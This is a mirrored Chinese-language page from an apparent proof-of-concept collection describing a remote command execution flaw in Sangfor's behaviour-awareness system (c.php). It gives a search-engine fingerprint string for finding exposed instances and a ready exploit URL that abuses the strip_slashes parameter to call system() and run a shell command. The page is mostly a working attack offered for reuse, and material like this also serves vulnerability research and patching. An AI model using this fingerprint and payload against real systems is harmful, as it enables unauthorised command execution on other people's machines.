admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-07 03:44:10 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/Web应用漏洞/深信服 行为感知系统 c.php 远程命令执行漏洞.md
Threekiii 772a085cfa 更新漏洞
2023-08-28 15:55:36 +08:00

39 lines
529 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 深信服 行为感知系统 c.php 远程命令执行漏洞
## 漏洞描述
深信服 行为感知系统 c.php 远程命令执行漏洞使用与EDR相同模板和部分文件导致命令执行
## 漏洞影响
```
深信服 行为感知系统
```
## 网络测绘
```
body="isHighPerformance : !!SFIsHighPerformance,"
```
## 漏洞复现
登录页面如下
![](./images/202202091914752.png)
访问漏洞Url
```plain
/tool/log/c.php?strip_slashes=system&host=ipconfig
```
![](./images/202202091914059.png)
Reference in New Issue View Git Blame Copy Permalink